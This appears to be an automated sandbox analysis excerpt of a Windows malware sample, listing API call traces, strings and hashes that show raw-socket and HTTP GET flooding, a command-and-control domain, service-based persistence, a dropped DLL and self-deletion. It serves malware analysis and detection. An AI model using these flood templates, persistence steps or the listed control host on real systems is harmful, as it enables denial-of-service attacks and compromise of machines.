                                • String ID:
                                • API String ID: 2422867632-0
                                APIs
                                • EnumResourceNamesA.KERNEL32(00000000,0000000A,Function_00005244,00000000), ref: 00405341
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 004074A4
                                • GetProcAddress.KERNEL32(00000000), ref: 004074AD
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 004074BB
                                • GetProcAddress.KERNEL32(00000000), ref: 004074BE
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004074CE
                                • GetProcAddress.KERNEL32(00000000), ref: 004074D1
                                • socket.WS2_32(00000002,00000003,000000FF), ref: 004075A9
                                • inet_addr.WS2_32 ref: 0040764A
                                • sendto.WS2_32(?,?,00000033,00000000,?,00000010), ref: 0040789E
                                • RtlExitUserThread.NTDLL(00000000), ref: 004078E3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407904
                                • GetProcAddress.KERNEL32(00000000), ref: 0040790B
                                • wsprintfA.USER32 ref: 0040799E
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407A07
                                • Sleep.KERNEL32(000007D0), ref: 00407A12
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00407A1B
                                • Sleep.KERNEL32(0000000A), ref: 00407A1F
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407A25
                                • wsprintfA.USER32 ref: 00407A7B
                                • send.WS2_32(00000000,?,?,00000000), ref: 00407ACE
                                • Sleep.KERNEL32(00000032,?,00000000), ref: 00407AD9
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407AE4
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket,?,00000001,00000000,76F90F00), ref: 00407B04
                                • GetProcAddress.KERNEL32(00000000), ref: 00407B0B
                                • wsprintfA.USER32 ref: 00407B90
                                  • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                  • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C73
                                  • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                  • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C84
                                  • Part of subcall function 00406C50: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                  • Part of subcall function 00406C50: GetProcAddress.KERNEL32(00000000), ref: 00406C95
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00407C17
                                • Sleep.KERNEL32(00001388), ref: 00407C26
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00407C33
                                • wsprintfA.USER32 ref: 00407C6C
                                • wsprintfA.USER32 ref: 00407C91
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                • send.WS2_32(00000000,?,?,00000000), ref: 00407D69
                                • Sleep.KERNEL32(0000000A,?,00000000), ref: 00407D70
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407D7A
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00407DAA
                                • GetProcAddress.KERNEL32(00000000), ref: 00407DB3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00407DC1
                                • GetProcAddress.KERNEL32(00000000), ref: 00407DC4
                                • socket.WS2_32(00000002,00000002,00000000), ref: 00407E2A
                                • sendto.WS2_32(00000000,?,-00000800,00000000,?,00000010), ref: 00407EA5
                                • Sleep.KERNEL32(00000005), ref: 00407EB7
                                • RtlExitUserThread.NTDLL(00000000), ref: 00407ECD
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00407EF4
                                • GetProcAddress.KERNEL32(00000000), ref: 00407EFB
                                • wsprintfA.USER32 ref: 00407F74
                                • wsprintfA.USER32 ref: 00407FB6
                                • send.WS2_32(00000000,?,?,00000000), ref: 00408010
                                • Sleep.KERNEL32(00000032,?,00000000), ref: 00408019
                                • RtlExitUserThread.NTDLL(00000000), ref: 0040801F
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00408044
                                • GetProcAddress.KERNEL32(00000000), ref: 0040804B
                                • wsprintfA.USER32 ref: 004080B3
                                • wsprintfA.USER32 ref: 004080CF
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                  • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                  • Part of subcall function 00408680: socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                • send.WS2_32(00000000,?,?,00000000), ref: 00408110
                                • Sleep.KERNEL32(00000005,?,00000000), ref: 00408119
                                • RtlExitUserThread.NTDLL(00000000), ref: 00408126
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                • GetProcAddress.KERNEL32(00000000), ref: 00408176
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                • GetProcAddress.KERNEL32(00000000), ref: 00408188
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040819D
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                • GetProcAddress.KERNEL32(00000000), ref: 004081AF
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                • GetProcAddress.KERNEL32(00000000), ref: 004081C1
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                • GetProcAddress.KERNEL32(00000000), ref: 004081D6
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                • GetProcAddress.KERNEL32(00000000), ref: 004081E8
                                Strings
                                • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407F6E
                                • a, xrefs: 004075F7
                                • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 004080C9
                                • WS2_32.dll, xrefs: 00407487, 004074B4, 004074C5, 004078FF, 00407AFF, 00407DA5, 00407DBA, 00407EEF, 0040803F, 00408162, 00408180, 00408195, 004081A7, 004081B9, 004081CE, 004081E0
                                • GET %s HTTP/1.1Host: %s, xrefs: 00407C66
                                • GET %s HTTP/1.1Host: %s:%d, xrefs: 00407C8B
                                • a, xrefs: 004075FF
                                • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0, xrefs: 00407A6E
                                • gethostname, xrefs: 004081DB
                                • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407CD0
                                • closesocket, xrefs: 004078FA, 00407AFA, 00407EEA, 0040803A, 004081B4
                                • GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 00407D13
                                • GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache, xrefs: 00407A4F
                                • E, xrefs: 0040760C
                                • htons, xrefs: 00407482, 00407DA0, 0040817B
                                • D, xrefs: 00407B9D
                                • gethostbyname, xrefs: 0040815D
                                • %s %s%s, xrefs: 00407998, 00407B8A
                                • GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#, xrefs: 00407BC9
                                • setsockopt, xrefs: 004074AF, 00407DB5, 00408190
                                • GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00407FB0
                                • WSAStartup, xrefs: 004074C0, 004081A2
                                • WSASocketA, xrefs: 004081C9
                                Similarity
                                • API ID: AddressLibraryLoadProc$wsprintf$Sleep$ExitThreadUser$Processsend$socket$CreateTerminateinet_addrsendto$gethostbyname
                                • String ID: %s %s%s$D$E$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Host: %s$GET %s HTTP/1.1Host: %s:%d$GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache$GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#$WS2_32.dll$WSASocketA$WSAStartup$a$a$closesocket$gethostbyname$gethostname$htons$setsockopt
                                • API String ID: 1429884815-199250815
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405B47
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B50
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenSCManagerA), ref: 00405B5E
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B61
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,OpenServiceA), ref: 00405B6F
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B72
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CloseServiceHandle), ref: 00405B80
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B83
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,CopyFileA), ref: 00405B95
                                • GetProcAddress.KERNEL32(00000000), ref: 00405B98
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegSetValueExA), ref: 00405BA6
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BA9
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,StartServiceA), ref: 00405BB7
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BBA
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyA), ref: 00405BC8
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BCB
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,UnlockServiceDatabase), ref: 00405BD9
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BDC
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,ChangeServiceConfig2A), ref: 00405BEA
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BED
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,CreateServiceA), ref: 00405BFB
                                • GetProcAddress.KERNEL32(00000000), ref: 00405BFE
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,LockServiceDatabase), ref: 00405C09
                                • GetProcAddress.KERNEL32(00000000), ref: 00405C0C
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00405C24
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00405C32
                                • strlen.MSVCRT ref: 00405C3F
                                • strncmp.MSVCRT ref: 00405C53
                                • GetLastError.KERNEL32 ref: 00405E3E
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                • wsprintfA.USER32 ref: 00405CB5
                                • _mbscat.MSVCRT ref: 00405CC7
                                • _mbscat.MSVCRT ref: 00405CDA
                                • memset.MSVCRT ref: 00405D00
                                • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 00405D13
                                • _mbscpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 00405F8E
                                • _mbscat.MSVCRT ref: 00405F9D
                                • lstrlen.KERNEL32(004059DB), ref: 00406014
                                Similarity
                                • API ID: AddressLibraryLoadProc$_mbscat$_mbscpy$DirectoryErrorFileLastModuleNameWindowslstrlenmemsetstrlenstrncmpwsprintf
                                • String ID: %c%c%c%c%c%c.exe$ADVAPI32.dll$ChangeServiceConfig2A$CloseServiceHandle$CopyFileA$CreateServiceA$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq$Description$KERNEL32.dll$LockServiceDatabase$OpenSCManagerA$OpenServiceA$RegCloseKey$RegOpenKeyA$RegSetValueExA$SYSTEM\CurrentControlSet\Services\$StartServiceA$UnlockServiceDatabase
                                • API String ID: 386357465-766656692
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
                                • GetProcAddress.KERNEL32(00000000), ref: 00406DD3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
                                • GetProcAddress.KERNEL32(00000000), ref: 00406DE4
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                  • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                • socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
                                • sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
                                • Sleep.KERNEL32(00000014), ref: 00406ECD
                                • RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
                                • GetProcAddress.KERNEL32(00000000), ref: 00406F13
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
                                • GetProcAddress.KERNEL32(00000000), ref: 00406F24
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
                                • GetProcAddress.KERNEL32(00000000), ref: 00406F35
                                • socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
                                • connect.WS2_32(00000000,?,00000010), ref: 00406FA7
                                • send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
                                • Sleep.KERNEL32(0000000A), ref: 00407032
                                • RtlExitUserThread.NTDLL(00000000), ref: 0040703B
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
                                • GetProcAddress.KERNEL32(00000000), ref: 00407077
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
                                • GetProcAddress.KERNEL32(00000000), ref: 0040708A
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
                                • GetProcAddress.KERNEL32(00000000), ref: 0040709B
                                • sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
                                • RtlExitUserThread.NTDLL(00000000), ref: 004071AB
                                • Sleep.KERNEL32(000001F4), ref: 00407210
                                • RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc$ExitThreadUser$Sleep$sendtosocket$connectgethostbynameinet_addrsend
                                • String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
                                • API String ID: 1080867297-3926040945
                                • Opcode ID: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
                                • Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
                                • Opcode Fuzzy Hash: f8a2499b1aef589c456f9f75b8d754b15eace620b909dc858667b967397af7d0
                                • Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                • GetProcAddress.KERNEL32(00000000), ref: 00408176
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                • GetProcAddress.KERNEL32(00000000), ref: 00408188
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040819D
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                • GetProcAddress.KERNEL32(00000000), ref: 004081AF
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                • GetProcAddress.KERNEL32(00000000), ref: 004081C1
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                • GetProcAddress.KERNEL32(00000000), ref: 004081D6
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                • GetProcAddress.KERNEL32(00000000), ref: 004081E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
                                • API String ID: 2574300362-3688028543
                                • Opcode ID: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
                                • Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
                                • Opcode Fuzzy Hash: 4a3c82638dccf32fa90216d1273ea8970814657705a3f54d8f00e494abda61eb
                                • Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C73
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C84
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C95
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
                                • API String ID: 2574300362-3412716298
                                • Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
                                • Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                • GetProcAddress.KERNEL32(00000000), ref: 00403578
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                • SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                • GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                • SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                • GetCurrentThread.KERNEL32 ref: 0040369B
                                • SetThreadPriority.KERNEL32(00000000), ref: 004036A2
                                • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Priority$ClassCurrentNameThread$AddressChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcProcessShellShortVariable
                                • String ID: > nul$/c del $<$COMSPEC$Defghi Klmnopqr Tuv$KERNEL32.dll$O$e$lstrcatA$n$p
                                • API String ID: 3227834783-364147672
                                • Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
                                • Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
                                • GetProcAddress.KERNEL32(00000000), ref: 00405261
                                • FindResourceA.KERNEL32(?,?,?), ref: 00405272
                                • LoadResource.KERNEL32(?,00000000), ref: 00405291
                                • LockResource.KERNEL32(00000000), ref: 004052A9
                                • wsprintfA.USER32 ref: 004052C4
                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004052E0
                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
                                • lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
                                • WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
                                • CloseHandle.KERNEL32(00000000), ref: 00405326
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Resource$LoadWrite$AddressCloseCreateFindHandleLibraryLockPointerProclstrlenwsprintf
                                • String ID: SizeofResource$hra%u.dll$kernel32.dll
                                • API String ID: 1940342438-2774179399
                                • Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
                                • Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
                                • GetProcAddress.KERNEL32(00000000), ref: 0040589F
                                • Sleep.KERNEL32(000001F4), ref: 004058E2
                                • Sleep.KERNEL32(000001F4), ref: 00405926
                                • Sleep.KERNEL32(000001F4), ref: 00405961
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$AddressLibraryLoadProc
                                • String ID: ADVAPI32.dll$SetServiceStatus
                                • API String ID: 238394870-1924299548
                                • Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
